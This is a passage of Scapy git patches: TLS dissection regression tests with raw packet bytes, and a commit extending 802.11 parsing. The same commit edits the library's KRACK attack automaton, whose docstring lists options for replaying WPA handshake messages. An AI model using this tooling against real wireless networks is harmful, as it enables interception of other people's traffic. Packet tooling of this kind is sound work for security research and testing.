\x0b\x97\xa9E\x85\xdd\xb3\x8b\xe5\x897\x8e)\r\xfc\x06\x17\xf68@\x0eB\xe4\x12\x06\xfb{\xf3\xc6\x11hb\xdf\xe3\x98\xf4\x13\xd8\x15O\x8b\xb1i\xd9\x10`\xbcd*\xea1\xb7\xe4\xb5\xa3:\x14\x9b&\xe3\x0b{\xfd\x02\x8e\xb6\x99\xc18\x97Y6\xf6\xa8t\xa2\x86\xb6^\xeb\xc6d\xea\xcf\xa0\xa3\xf9n\x9e\xba-\x11\xb6\x86\x98\x08X-\xc9\xac%d\xf2^u\xb48\xc1\xae\x7fZF\x83\xeaQ\xca\xb6\xf1\x99\x115k\xa5j{\xc6\x00\xb0\xe7\xf8\xbed\xb2\xad\xc8\xc2\xf1\xac\xe3Q\xea\xa4\x93\xe0y\xc8\xe1\x81@\xc9\n[\xe1\x12<\xc1`*\xe3\x97\xc0\x89B\xca\x94\xcfF\x98\x12i\xbb\x98\xd0\xc2\xd3\rrKGn\xe5\x93\xc42(c\x87C\xe4\xb02>\n\xd3K\xbf#\x9b\x14)A+\x9a\x04\x1f\x93-\xf1\xc79H<\xadZ\x12\x7f\x0c\x00\x01I\x03\x00\x17A\x04\x13\x1c\x02q\xd4m\x97\x01\x99\xcf\xf2\x80G\xa8\xe1\xdf\x1ak\xbf\x1fJ\xf9\x9e\xd0\x02\x01W\x9d\xb8\xbc*\xf9S\xb6\xbf\xb8\xf1\xc1\x89\xcd\x96C(\xa8|\x189\x13\xcd\xc5\xf7Q\x1e\xe17h~\x8c`\x1f8\x8e\xacq\x04\x01\x01\x00\xc1R`\xb8\x14!\xed\xb9\xbca\x9d0{\xb7\x95\x94\x80\x06\t.A\xcc\x82\x99\x89N_\xa1\x08M%#\x1fg\xb6\xa2\xfe\x00\xd6\xa8\xe9\x9fd\x91O\xdbzw\xbfS\x88?\xeb[2\x7f\xa1\xeb\xd1vmi_\x95\xd0A\x04`\x01+\x02\\\x99\xa0\xe9\n\xb5\xb5j\x85\x89J\x82\xf8\x00\xbb\xa3%\x14\x15D\xbf9\x12{\x9e\xca\x0e\x92\xdf\xbb\xfd\xd3\xc8\x0ez\x04n \x12\x01\xd2|\xc6t\xc36\xce>:J\xc3\x81+d\xbc\xb1\x1d\x8d\x00o\x00\xc9\xd4%\xb6\x90\x1f\xe1\xc5\x14\xb5Qk\x06\x1e\xf6{\xbdJ\xb2H\xcbf\xe9_mQ(\x9e4\x10U#\xcd4\x88\x1c\xfb\x03\x80(Q:\x9c\x0f\x16\xed\xad\xb4\x18k\t\xc5$\x97}~s\xc1\xca\xae\x9d\xd1q\x94\x9fi+Pj\x80:v\xc1z#\xf6\xee]ou~\xa3\xd9I\xce\xb8Z|\x1b\x8ep\xc6\x19\xb4A\x03\x92\x1bp\x16\x10\x0f\x84\xa9\x9f\xb7\xc9\x01\xc8^\x93\xaat\r\x87\x96\x86\xf6\xc5\xfe\x88\x13\xc3N\x0e\x00\x00\x00' +p = TLS(a) +p.clear_cache() +assert raw(p) == a + += Issue 2763 + +dd = conf.debug_dissector +conf.debug_dissector = False + +p = Ether(b'RU\x10\x00\x02\x02RT\x00\x124V\x08\x00E\x00\x05\xc8\r\xd8\x00\x00@\x06\x96\x9d\x9c&\xce\x12\xc0\xa8\xa5\xd9\x01\xbb\xc0\x1f\x00w$\x02\x03\xbe\xc5#P\x10#(\x0b\x9e\x00\x00\x16\x03\x03\x0e4\x02\x00\x00M\x03\x03^\xfa\xb5~\x88\xdf\xdc#}\'\xa0\xff\xa2\xe2\xb5\xec\x0e\x93\xa8\xe0\xde\x01[\x13[F\x151 x\xc6\xcc `)\x00\x00\x8aZ\x90l\xda\x0b\xe1\xec[i\x13\xa7\x8e\xb9a\x98"\x8a7L\x9d\x90\xe0\x01\x06c$9\xc0\'\x00\x00\x05\xff\x01\x00\x01\x00\x0b\x00\x0c\x8e\x00\x0c\x8b\x00\x06n0\x82\x06j0\x82\x05R\xa0\x03\x02\x01\x02\x02\x10EY\xe8\x1c\x1e\x9a\xe0?X\xaa\xc3\xbc\xcd`jh0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0b\x05\x000\x81\x8f1\x0b0\t\x06\x03U\x04\x06\x13\x02GB1\x1b0\x19\x06\x03U\x04\x08\x13\x12Greater Manchester1\x100\x0e\x06\x03U\x04\x07\x13\x07Salford1\x180\x16\x06\x03U\x04\n\x13\x0fSectigo Limited1705\x06\x03U\x04\x03\x13.Sectigo RSA Domain Validation Secure Server CA0\x1e\x17\r190309000000Z\x17\r210308235959Z0W1!0\x1f\x06\x03U\x04\x0b\x13\x18Domain Control Validated1\x1d0\x1b\x06\x03U\x04\x0b\x13\x14PositiveSSL Wildcard1\x130\x11\x06\x03U\x04\x03\x0c\n*.mql5.net0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xcb\xbcn=\xbaGd\xe1XB\x07\xc9\xb1\xc8/\x86\xaa4Z\xbdNk\xfb\xffR\x8f\xe4\x1c^\x91m8\xb9^\x97\xa5\xd3N\xfb\x80\x92\x8ap\xda\x15\x9f\xee\xe7\xb3\xc8?\xb0>~\xaa\x07\x91\xb1\x99q\xe2\xe5\xc8\x9b\x1d5\xa0\x96,\x98\xdaW\x93\x95\x8e%\xe8\xd4L\xeb\xcbSg\x15"\xba\xb7\xc7\x1f\xe9\xd6\x1a\xe6E\x1d\xc8\x1e%\xd36\xe0/r\xd1\xce1C\xce\x91&\xa1\x08*R\xbf\x8cu\xb0\xda\x0e\x1e2\xd66\x1df&3\x9b\x03\x0b\xcam:\xf7\x12\xd9ud(\xae\xdc\xbci\x85\xbd\xcf\xeb{\x15:\xbd\x0e\x11\x1bi\xd8\xff]y~E\x15\x95\xee\xe9\xea\xc6Cr~\xaa\x07\x91\xb1\x99q\xe2\xe5\xc8\x9b\x1d5\xa0\x96,\x98\xdaW\x93\x95\x8e%\xe8\xd4L\xeb\xcbSg\x15"\xba\xb7\xc7\x1f\xe9\xd6\x1a\xe6E\x1d\xc8\x1e%\xd36\xe0/r\xd1\xce1C\xce\x91&\xa1\x08*R\xbf\x8cu\xb0\xda\x0e\x1e2\xd66\x1df&3\x9b\x03\x0b\xcam:\xf7\x12\xd9ud(\xae\xdc\xbci\x85\xbd\xcf\xeb{\x15:\xbd\x0e\x11\x1bi\xd8\xff]y~E\x15\x95\xee\xe9\xea\xc6Cr2\x11\xc8\x9b\x86B9\x8dM\x12\xb7X\x1b\x19\xf3\x9d+\xa1\x98\x82\xca\xd7;$\xfb\t9\xb0\xbc\xc2\x95\xcf\x82)u\x16)?B \x17+M@\x8cVl\xad\xba\x0f4\x85\xb1\x7f@yqx\xb7\xa5\x04\xbb\x94\xf7\xb5A\x95\xee|\xeb\x8d\x0cyhY\xef\xcb\xb3\xfa>x\x1e\xeegLz\xdd\xe0\x99\xef\xda\xe7\xef\xb2\t]\xbe\x80 !\x05\x83,D\xdb]*v)\xa5\xb0#\x88t\x07T"\xd6)z\x92\xf5o-\x9e\xe7\xf8&+\x9cXe\x02\x03\x01\x00\x01\xa3o0m0\t\x06\x03U\x1d\x13\x04\x020\x000\x0b\x06\x03U\x1d\x0f\x04\x04\x03\x02\x05\xe00\x1d\x06\x03U\x1d\x0e\x04\x16\x04\x14\xa1+ p\xd2k\x80\xe5e\xbc\xeb\x03\x0f\x88\x9ft\xad\xdd\xf6\x130\x1f\x06\x03U\x1d#\x04\x180\x16\x80\x14fS\x94\xf4\x15\xd1\xbdgh\xb0Q725\xe1\xa4\xaa\xde\x07|0\x13\x06\x03U\x1d%\x04\x0c0\n\x06\x08+\x06\x01\x05\x05\x07\x03\x010\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0b\x05\x00\x03\x82\x01\x01\x00\x81\x88\x92sk\x93\xe7\x95\xd6\xddA\xee\x8e\x1e\xbd\xa3HX\xa7A5?{}\xd07\x98\x0e\xb8,\x94w\xc8Q6@\xadY\t(\xc8V\xd6\xea[\xac\xb4\xd8?h\xb7f\xca\xe1V7\xa9\x00e\xeaQ\xc9\xec\xb2iI]\xf9\xe3\xc0\xedaT\xc9\x12\x9f\xc6\xb0\nsU\xe8U5`\xef\x1c6\xf0\xda\xd1\x90wV\x04\xb8\xab8\xee\xf7\t\xc5\xa5\x98\x90#\xea\x1f\xdb\x15\x7f2(\x81\xab\x9b\x85\x02K\x95\xe77Q{\x1bH.\xfb>R\xa3\r\xb4F\xa9\x92:\x1c\x1f\xd7\n\x1eXJ\xfa.Q\x8f)\xc6\x1e\xb8\x0e1\x0es\xf1\'\x88\x17\xca\xc8i\x0c\xfa\x83\xcd\xb3y\x0e\x14\xb0\xb8\x9b/:-\t\xe3\xfc\x06\xf0:n\xfd6;+\x1a\t*\xe8\xab_\x8c@\xe4\x81\xb2\xbc\xf7\x83g\x11nN\x93\xea"\xaf\xff\xa3\x9awWv\xd0\x0b8\xac\xf8\x8a\x945\x8e\xd7\xd4a\xcc\x01\xff$\xb4\x8fa#\xba\x88\xd7Y\xe4\xe9\xba*N\xb5\x15\x0f\x9c\xd0\xea\x06\x91\xd9\xde\xab\x0c\x00\x01I\x00@\xd1L\xf3\xe7\x8b\xdd\x98\xff\xb2\xf5Rd\xd6\x85\x0f\r{\x9f\xc2\xc0\x8aY\xbf.\xfb\xf0o\x96\xa5\xba;\x877qet\xe8\xe4K\xd7\xcb\xb8\xecAk>S\xe0\xa5\xc3\xfc\xe8\xde\xf1\xb0\xe5\x15s|\xb7\xe6D\x15+\x00\x03\x01\x00\x01\x01\x00H\xf1\x08\x88\xe9\xf8\xe6\xb2y\\\xf9\xf64\x95r\xf9\x8c]\x0b\x88%s\xee{\xd4\xa3{|Jd>\xfb\x01\x0b\xfdAf\xea\x13%\x1f\xcc\xba\xf8H\xed\xeb?u\x00\xc46\xe4\x9f!r\x99\xec\'!\xa1+\xe9\xcd;\xfa\x00a\xd1ME7\x9a\xc3C\xb2\xb0>\xec\x07\xff>\xb3\xa3\xbd\x8db\xa2\x17\x0b\xce\xe1H\xaf\xba_\xdc\x18\x83Fr^\xf6\xfd\x8f\xbd\xc1\xdf\xc3\xf9T\xc2RC\xfa1\xe1\x16\x94RgZ\xb1\xe8rycp\xaeEa@\xe2\xb7T\xe4\xaa7\x02\x1e\xb3\x0c_P\x14\xd9\x023]\xc9)\x1b\xd7]\xba\x8aS\x18\xe5\x88\x1e08W\xc7\xd5\xc0\x7f\xf6n\n>\x83_\r\t\x1f\x01\x99\xda\x88(\xbc\xd9\xb8!=\xb6%\x15wh\xacl)\xde\xb3-\x81M\xc6(,\xceom\x15W7\xcc\xd3\xe3\xc2e\xb4\x96\xf1\xfc\x1e\xa5?\xe1B\xbd\x00\x89\xc1\xd0t\xd6\xaa\xf8\xa7\x1f\xa1z}\x91M\x8egg\xa1}\x93\xaal\xec\x16@\xf3\xd7\x0b\x91\n\xcc\x0e\x00\x00\x00') + +assert p.msg[0].extlen is None +assert p.msg[0].ext == [] +assert [type(x) for x in a.msg] == [TLSServerHello, TLSCertificate, TLSServerKeyExchange, TLSServerHelloDone] + ############################################################################### ############################ Automaton behaviour ############################## ############################################################################### diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index 5a029a85197..259a956f007 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -10,6 +10,7 @@ ~ server = Load server util functions +~ client from __future__ import print_function From c03d8d4227761a369f3f449ac5dafb3e21c364dd Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 15 Aug 2020 12:49:19 +0200 Subject: [PATCH 0254/1632] Several improvements to 802.11 - add 802.11 ERP - add 802.11 DSSSet - provide the meaning of the address fields dynamically - add some nicer default build bindings --- scapy/layers/dot11.py | 153 ++++++++++++++++++++++++++----- scapy/modules/krack/automaton.py | 62 ++++++++----- test/regression.uts | 17 +++- 3 files changed, 187 insertions(+), 45 deletions(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 38cc568073e..e6032b84b85 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -70,6 +70,7 @@ from scapy.layers.inet import IP, TCP from scapy.error import warning, log_loading from scapy.sendrecv import sniff, sendp +from scapy.utils import str2mac if conf.crypto_valid: @@ -525,6 +526,7 @@ def post_build(self, p, pay): # 802.11-2016 9.2 +# 802.11-2016 9.2.4.1.3 _dot11_subtypes = { 0: { # Management 0: "Association Request", @@ -573,7 +575,7 @@ def post_build(self, p, pay): 14: "QoS CF-Poll (no data)", 15: "QoS CF-Ack+CF-Poll (no data)" }, - 4: { # Extension + 3: { # Extension 0: "DMG Beacon" } } @@ -591,13 +593,52 @@ def post_build(self, p, pay): } +_dot11_addr_meaning = [ + [ # Management: 802.11-2016 9.3.3.2 + "RA=DA", "TA=SA", "BSSID/STA", None, + ], + [ # Control + "RA", "TA", None, None + ], + [ # Data: 802.11-2016 9.3.2.1: Table 9-26 + [["RA=DA", "RA=DA"], ["RA=BSSID", "RA"]], + [["TA=SA", "TA=BSSID"], ["TA=SA", "TA"]], + [["BSSID", "SA"], ["DA", "DA"]], + [[None, None], ["SA", "BSSID"]], + ], + [ # Extension + "BSSID", None, None, None + ], +] + + +class _Dot11MacField(MACField): + """ + A MACField that displays the address type depending on the + 802.11 flags + """ + __slots__ = ["index"] + + def __init__(self, name, default, index): + self.index = index + super(_Dot11MacField, self).__init__(name, default) + + def i2repr(self, pkt, val): + s = super(_Dot11MacField, self).i2repr(pkt, val) + meaning = pkt.address_meaning(self.index) + if meaning: + return "%s (%s)" % (s, meaning) + return s + + +# 802.11-2016 9.2.4.1.1 class Dot11(Packet): name = "802.11" fields_desc = [ BitMultiEnumField("subtype", 0, 4, _dot11_subtypes, lambda pkt: pkt.type), BitEnumField("type", 0, 2, ["Management", "Control", "Data", - "Reserved"]), + "Extension"]), BitField("proto", 0, 2), ConditionalField( BitEnumField("cfe", 0, 4, _dot11_cfe), @@ -616,19 +657,19 @@ class Dot11(Packet): "pw-mgt", "MD", "protected", "order"]) ), ShortField("ID", 0), - MACField("addr1", ETHER_ANY), + _Dot11MacField("addr1", ETHER_ANY, 1), ConditionalField( - MACField("addr2", ETHER_ANY), + _Dot11MacField("addr2", ETHER_ANY, 2), lambda pkt: (pkt.type != 1 or pkt.subtype in [0x8, 0x9, 0xa, 0xb, 0xe, 0xf]), ), ConditionalField( - MACField("addr3", ETHER_ANY), + _Dot11MacField("addr3", ETHER_ANY, 3), lambda pkt: pkt.type in [0, 2], ), ConditionalField(LEShortField("SC", 0), lambda pkt: pkt.type != 1), ConditionalField( - MACField("addr4", ETHER_ANY), + _Dot11MacField("addr4", ETHER_ANY, 4), lambda pkt: (pkt.type == 2 and pkt.FCfield & 3 == 3), # from-DS+to-DS ) @@ -639,7 +680,8 @@ def mysummary(self): return self.sprintf("802.11 %%%s.type%% %%%s.subtype%% %%%s.addr2%% > %%%s.addr1%%" % ((self.__class__.__name__,) * 4)) # noqa: E501 def guess_payload_class(self, payload): - if self.type == 0x02 and (0x08 <= self.subtype <= 0xF and self.subtype != 0xD): # noqa: E501 + if self.type == 0x02 and ( + 0x08 <= self.subtype <= 0xF and self.subtype != 0xD): return Dot11QoS elif self.FCfield.protected: # When a frame is handled by encryption, the Protected Frame bit @@ -666,6 +708,31 @@ def answers(self, other): return 0 return 0 + def address_meaning(self, index): + """ + Return the meaning of the address[index] considering the context + """ + if index not in [1, 2, 3, 4]: + raise ValueError("Wrong index: should be [1, 2, 3, 4]") + index = index - 1 + if self.type == 0: # Management + return _dot11_addr_meaning[0][index] + elif self.type == 1: # Control + return _dot11_addr_meaning[1][index] + elif self.type == 2: # Data + meaning = _dot11_addr_meaning[2][index][ + self.FCfield.to_DS + ][self.FCfield.from_DS] + if meaning and index in [2, 3]: # Address 3-4 + if isinstance(self.payload, Dot11QoS): + # MSDU and Short A-MSDU + if self.payload.A_MSDU_Present: + meaning = "BSSID" + return meaning + elif self.type == 3: # Extension + return _dot11_addr_meaning[3][index] + return None + def unwep(self, key=None, warn=1): if self.FCfield & 0x40 == 0: if warn: @@ -699,11 +766,11 @@ def post_build(self, p, pay): class Dot11QoS(Packet): name = "802.11 QoS" - fields_desc = [BitField("Reserved", None, 1), - BitField("Ack_Policy", None, 2), - BitField("EOSP", None, 1), - BitField("TID", None, 4), - ByteField("TXOP", None)] + fields_desc = [BitField("A_MSDU_Present", 0, 1), + BitField("Ack_Policy", 0, 2), + BitField("EOSP", 0, 1), + BitField("TID", 0, 4), + ByteField("TXOP", 0)] def guess_payload_class(self, payload): if isinstance(self.underlayer, Dot11): @@ -889,6 +956,15 @@ class Dot11Elt(Packet): max_length=255)] show_indent = 0 + def __setattr__(self, attr, val): + if attr == "info": + # Will be caught by __slots__: we need an extra call + try: + self.setfieldval(attr, val) + except AttributeError: + pass + super(Dot11Elt, self).__setattr__(attr, val) + def mysummary(self): if self.ID == 0: ssid = repr(self.info) @@ -933,10 +1009,44 @@ def post_build(self, p, pay): return p + pay +class _OUIField(X3BytesField): + def i2repr(self, pkt, val): + by_val = struct.pack("!I", val or 0)[1:] + oui = str2mac(by_val + b"\0" * 3)[:8] + if conf.manufdb: + fancy = conf.manufdb._get_manuf(oui) + if fancy != oui: + return "%s (%s)" % (fancy, oui) + return oui + + +class Dot11EltDSSSet(Dot11Elt): + name = "802.11 DSSS Parameter Set" + match_subclass = True + fields_desc = [ + ByteEnumField("ID", 3, _dot11_id_enum), + ByteField("len", 1), + ByteField("channel", 0), + ] + + +class Dot11EltERP(Dot11Elt): + name = "802.11 ERP" + match_subclass = True + fields_desc = [ + ByteEnumField("ID", 42, _dot11_id_enum), + ByteField("len", 1), + BitField("NonERP_Present", 0, 1), + BitField("Use_Protection", 0, 1), + BitField("Barker_Preamble_Mode", 0, 1), + BitField("res", 0, 5), + ] + + class RSNCipherSuite(Packet): name = "Cipher suite" fields_desc = [ - X3BytesField("oui", 0x000fac), + _OUIField("oui", 0x000fac), ByteEnumField("cipher", 0x04, { 0x00: "Use group cipher suite", 0x01: "WEP-40", @@ -962,7 +1072,7 @@ def extract_padding(self, s): class AKMSuite(Packet): name = "AKM suite" fields_desc = [ - X3BytesField("oui", 0x000fac), + _OUIField("oui", 0x000fac), ByteEnumField("suite", 0x01, { 0x00: "Reserved", 0x01: "802.1X", @@ -1049,8 +1159,8 @@ class Dot11EltRSN(Dot11Elt): 0 if pkt.len is None else pkt.len - ( 12 + - pkt.nb_pairwise_cipher_suites * 4 + - pkt.nb_akm_suites * 4 + (pkt.nb_pairwise_cipher_suites or 0) * 4 + + (pkt.nb_akm_suites or 0) * 4 ) >= 2 ) ), @@ -1125,7 +1235,7 @@ class Dot11EltRates(Dot11Elt): class Dot11EltHTCapabilities(Dot11Elt): - name = "HT Capabilities" + name = "802.11 HT Capabilities" match_subclass = True fields_desc = [ ByteEnumField("ID", 45, _dot11_id_enum), @@ -1211,7 +1321,7 @@ class Dot11EltVendorSpecific(Dot11Elt): fields_desc = [ ByteEnumField("ID", 221, _dot11_id_enum), ByteField("len", None), - X3BytesField("oui", 0x000000), + _OUIField("oui", 0x000000), StrLenField("info", "", length_from=lambda x: x.len - 3) ] @@ -1240,10 +1350,10 @@ class Dot11EltMicrosoftWPA(Dot11EltVendorSpecific): name = "802.11 Microsoft WPA" match_subclass = True ID = 221 + oui = 0x0050f2 # It appears many WPA implementations ignore the fact # that this IE should only have a single cipher and auth suite - fields_desc = Dot11EltRSN.fields_desc[:2] + [ - X3BytesField("oui", 0x0050f2), + fields_desc = Dot11EltVendorSpecific.fields_desc[:3] + [ XByteField("type", 0x01) ] + Dot11EltRSN.fields_desc[2:8] @@ -1437,7 +1547,7 @@ class Dot11TKIP(Dot11Encrypted): class Dot11CCMP(Dot11Encrypted): - name = "802.11 TKIP packet" + name = "802.11 CCMP packet" fields_desc = [ # iv - 8 bytes ByteField("PN0", 0), @@ -1461,6 +1571,7 @@ class Dot11CCMP(Dot11Encrypted): bind_top_down(RadioTap, Dot11FCS, present=2, Flags=16) +bind_top_down(Dot11, Dot11QoS, type=2, subtype=0xc) bind_layers(PrismHeader, Dot11,) bind_layers(Dot11, LLC, type=2) diff --git a/scapy/modules/krack/automaton.py b/scapy/modules/krack/automaton.py index 0775fb6195e..4cbf48f4a7e 100644 --- a/scapy/modules/krack/automaton.py +++ b/scapy/modules/krack/automaton.py @@ -14,9 +14,22 @@ from scapy.compat import raw, chb from scapy.consts import LINUX from scapy.error import log_runtime -from scapy.layers.dot11 import RadioTap, Dot11, Dot11AssoReq, Dot11AssoResp, \ - Dot11Auth, Dot11Beacon, Dot11Elt, Dot11EltRates, Dot11EltRSN, \ - Dot11ProbeReq, Dot11ProbeResp, RSNCipherSuite, AKMSuite +from scapy.layers.dot11 import ( + AKMSuite, + Dot11, + Dot11AssoReq, + Dot11AssoResp, + Dot11Auth, + Dot11Beacon, + Dot11Elt, + Dot11EltDSSSet, + Dot11EltRSN, + Dot11EltRates, + Dot11ProbeReq, + Dot11ProbeResp, + RSNCipherSuite, + RadioTap, +) from scapy.layers.eap import EAPOL from scapy.layers.l2 import ARP, LLC, SNAP, Ether from scapy.layers.dhcp import DHCP_am @@ -83,27 +96,33 @@ def parse_args(self, ap_mac, ssid, passphrase, **kwargs): """ Mandatory arguments: - @iface: interface to use (must be in monitor mode) - @ap_mac: AP's MAC - @ssid: AP's SSID - @passphrase: AP's Passphrase (min 8 char.) + + :param iface: interface to use (must be in monitor mode) + :param ap_mac: AP's MAC + :param ssid: AP's SSID + :param passphrase: AP's Passphrase (min 8 char.) Optional arguments: - @channel: used by the interface. Default 6, autodetected on windows + + :param channel: used by the interface. Default 6 Krack attacks options: - Msg 3/4 handshake replay: - double_3handshake: double the 3/4 handshake message - encrypt_3handshake: encrypt the second 3/4 handshake message - wait_3handshake: time to wait (in sec.) before sending the second 3/4 - - double GTK rekeying: - double_gtk_refresh: double the 1/2 GTK rekeying message - wait_gtk: time to wait (in sec.) before sending the GTK rekeying - arp_target_ip: Client IP to use in ARP req. (to detect attack success) - If None, use a DHCP server - arp_source_ip: Server IP to use in ARP req. (to detect attack success) - If None, use the DHCP server gateway address + + :param double_3handshake: double the 3/4 handshake message + :param encrypt_3handshake: encrypt the second 3/4 handshake message + :param wait_3handshake: time to wait (in sec.) before sending the + second 3/4 + + - double GTK rekeying: + + :param double_gtk_refresh: double the 1/2 GTK rekeying message + :param wait_gtk: time to wait (in sec.) before sending the GTK rekeying + :param arp_target_ip: Client IP to use in ARP req. (to detect attack + success). If None, use a DHCP server + :param arp_source_ip: Server IP to use in ARP req. (to detect attack + success). If None, use the DHCP server gateway address """ super(KrackAP, self).parse_args(**kwargs) @@ -215,13 +234,14 @@ def build_ap_info_pkt(self, layer_cls, dest): """Build a packet with info describing the current AP For beacon / proberesp use """ + ts = int(time.time() * 1e6) & 0xffffffffffffffff return RadioTap() \ / Dot11(addr1=dest, addr2=self.mac, addr3=self.mac) \ - / layer_cls(timestamp=0, beacon_interval=100, + / layer_cls(timestamp=ts, beacon_interval=100, cap='ESS+privacy') \ / Dot11Elt(ID="SSID", info=self.ssid) \ / Dot11EltRates(rates=[130, 132, 139, 150, 12, 18, 24, 36]) \ - / Dot11Elt(ID="DSset", info=chb(self.channel)) \ + / Dot11EltDSSSet(channel=self.channel) \ / Dot11EltRSN(group_cipher_suite=RSNCipherSuite(cipher=0x2), pairwise_cipher_suites=[RSNCipherSuite(cipher=0x2)], akm_suites=[AKMSuite(suite=0x2)]) @@ -481,7 +501,7 @@ def send_auth_response(self, pkt): log_runtime.warning("Client %s connected!", self.client) # Launch DHCP Server - self.dhcp_server.run() + self.dhcp_server() rep = RadioTap() rep /= Dot11(addr1=self.client, addr2=self.mac, addr3=self.mac) diff --git a/test/regression.uts b/test/regression.uts index 7518d186be2..356bfa26d75 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -12100,11 +12100,14 @@ s == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ = Dot11 - dissection p = Dot11(s) Dot11 in p and p.addr3 == "00:00:00:00:00:00" -p.mysummary() == '802.11 Management Association Request 00:00:00:00:00:00 > 00:00:00:00:00:00' +assert p.mysummary() == '802.11 Management Association Request 00:00:00:00:00:00 (TA=SA) > 00:00:00:00:00:00 (RA=DA)' +assert "DA" in p.address_meaning(1) +assert "SA" in p.address_meaning(2) +assert "BSSID" in p.address_meaning(3) = Dot11QoS - build s = raw(Dot11()/Dot11QoS(Ack_Policy=1)) -assert s == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00' +assert s == b'\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00' s = raw(Dot11(type=2, subtype=8)/Dot11QoS(TID=4)) assert s == b'\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00' @@ -12127,7 +12130,11 @@ assert pkt[Dot11Elt::{"ID": 0}].summary() in [ = Dot11QoS - dissection p = Dot11(s) -Dot11QoS in p +assert Dot11QoS in p +assert p.TID == 4 +assert "DA" in p.address_meaning(1) +assert "SA" in p.address_meaning(2) +assert "BSSID" in p.address_meaning(3) = Dot11 - answers query = Dot11(type=0, subtype=0) @@ -12172,6 +12179,10 @@ assert pkt[Dot11TKIP].TSC3 == 33 assert pkt[Dot11TKIP].TSC4 == 0 assert pkt[Dot11TKIP].TSC5 == 160 +assert "DA" in pkt[Dot11].address_meaning(1) +assert "TA=BSSID" in pkt[Dot11].address_meaning(2) +assert "SA" in pkt[Dot11].address_meaning(3) + = Dot11CCMP - dissection pkt = RadioTap(b'\x00\x00\x0f\x00*\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x08b\x00\x00\x01\x00^\x7f\xff\xfa\x0e\xec\xda\x1d\xa3M\x00\x0eX7\xbe\xbe\x00\x8aD#\x00\xa0D#\x00\xa0\x00\x00\x00\x00c\xb7\rv/s\x88N;>\x07\x0e\xe5\xd9\xf5\xfa\xcdD\xc2he\xfc\xc5^m\xae\xf2\xfe\xf9\xb06\xce\rt\xbe\x9d(\xb5\x98\x848NU\x0f\x93\x0f]m\xa2\x96\x80{\x95\x00\xb5\x98Y!\xa3^\xfc\xda\xca.R\xf3\xd3\xf8^\xeda\x88\x82p\xc6\xb8L\x0b\x815-\x85(\xb1F\xd5K\x166dJ\xc7\x04B\xdb\xec\x8d\xb7:{\x0f\'g<\x06\xd07>\xde\xad\x08\xcb\xffr\xfa\xf4}o\xe9\xa9b\xa5)\x87\x90\xa5{\xe1\xea\x0f\x0fGf`x1\xbd\xc1\xe8\xa0\xb6(\x05gq\xf3\x99\x9e\x93\xde\'\x8e\nQ\xf7\xad\xf7\x89"\xee\xcf\xe8$\x8a\x9c\xb4\xe6\x03\xab\x9ec\xd0\xd5\x08\xca\xd2\xbb\xae\xcc\x9c$R\xbc\xcdFO?\xc3Ah\x9ch\xd4\x9b)m\xea\xbab+\'\x06I2\xb5!\xdb\x03\xbe\xb8\xb2\x86\x0f\x80\n\xbc\x85\x02\xb4T\x00\x00\xc7|\xac\xc0B\xb2\x89\xbb\xc5\xc0\x93\x858\xe3Q\xf9\t\xff4\xdb\x9a>\xe5O-e\x16\x81w!9m\xb9dZ\xaa\xaa0\x9cW\xaa\xa3\xf1\xdd\xecW\xdd\xc41D\xe6\xba\xf3SQ\x81S\xf6\xbd\xe3\xc0e\xba\xa0*\x15%\x9cz0\xa8\xa6l\x8e\x0c(\xd3\xe4\xa2\xf9\xc2:Yae#T\x8d\xef\x01\xfad\x05/\xdb\xf2!D\xde~\x0f\x99\xf6U\xf5\xbf\xd0\xaf\xbe0\xf7\xf03\xa8s`\x8d>4\x98\xb5Y\x06dXFz\x88\x82\'B\x84\xe6\xca\x05\x02\xd5G\xb6\x11\xed <\xb1\xd4\xc9\xa9\xaa\xae\xc9\xb3g\xbc\xfd+\xe7\x1aG\x92\x17\xdb\xce\xf7\x843\xce4\xc4w\x8f\x8a\x83\xf0\'\xfe\x87\x14\x95\xd3\x0bM\xbaL$\xc8\x8d\' 8\x87c 3yt\xc5\xeeN\xc9\xe1\x95\x1d\xe9\xddh\x87E\x07\xe5\x86\xc7\x82\x8a\x88\x05\xa4\x06\xb1\x0c\xddV\xd0\xf0d\xc8\xcet`\xc5C\xcb\x8f\x06]A\x92\x1a\xae5wc\x8dN\xa2\xf0}aJ\x9c\x8e\xd1\xb2[*\xffK\x0f\xf8u\xd5\x84#\xc3"\xffX\x9f\xffC\x0fb\x02n\x1b\xbaAr\x93\xe1\xb7\x1f\x8e\x1c\xfev]w\xaa\xcch\x8c{lm\xb9\x9aE\x08\x1d\xc28u\x82\xa8\xbe\xf2\xb3\x11\xdc\x90 \x83\xa7\x9c*:\x01R\xcf\xd6\xc6~\x989\x9a5\xc97\xfa\x10\xe4!uEP\x968\x00*\xd0\xefE\xf8{\x1d(\xcb\xe3IR\\r\xee\x9fU\x14\ty\xe3\xdc\x96@\xf4\x8d\x17\xab\xcc\x98I\x8e\xe16\x9e\xa5+\xe0\xa8{S\x051##\x90:A') From 32211b495ee2335265c2e13fc92fb1262b6e3175 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Thu, 20 Aug 2020 11:45:36 -0400 Subject: [PATCH 0255/1632] APCO, PrivateExtension & ULI-Timestamp IE (#2761) * APCO IE; PrivateExtension IE * Add tests for APCO * Add ULI TImestamp * Fix flake8 error * fix flake8 